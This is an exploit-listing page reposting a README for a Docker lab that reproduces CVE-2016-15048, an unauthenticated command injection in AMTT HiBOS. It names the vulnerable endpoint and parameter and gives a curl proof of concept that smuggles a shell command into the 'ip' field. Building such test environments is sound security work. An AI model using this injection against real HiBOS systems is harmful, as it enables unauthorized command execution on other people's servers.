Exploit for OS Command Injection in Amttgroup Hibos CVE-2016-15048

Name: Exploit for OS Command Injection in Amttgroup Hibos CVE-2016-15048
Rating: 5 (188 reviews)

2026-01-01 | CVSS 10.0

## https://sploitus.com/exploit?id=78EC7D35-723A-5FD5-9A0D-7294DFCFB648
# CVE-2016-15048 Test Environment

This directory contains a vulnerable environment for testing **CVE-2016-15048**: an unauthenticated command injection in AMTT Hotel Broadband Operation System (HiBOS).

## Prerequisites
- Docker
- Docker Compose

## Setup

Start the vulnerable environment using Docker Compose:

```bash
docker compose up -d --build
```

The application will be available at `http://localhost:8081`.

## Vulnerable Endpoint
- **URL**: `http://localhost:8081/manager/radius/server_ping.php`
- **Parameter**: `ip`

## Testing with Nuclei

You can test this environment using the provided Nuclei template:

```bash
nuclei -t ../http/cves/2016/CVE-2016-15048.yaml -u http://localhost:8081 -debug
```

## Manual Verification

You can also verify the vulnerability manually using `curl`:

```bash
curl "http://localhost:8081/manager/radius/server_ping.php?ip=127.0.0.1;echo%20vulnerable"
```

If vulnerable, the response will contain the string `vulnerable`.

## Cleanup

To stop and remove the environment:

```bash
docker compose down
```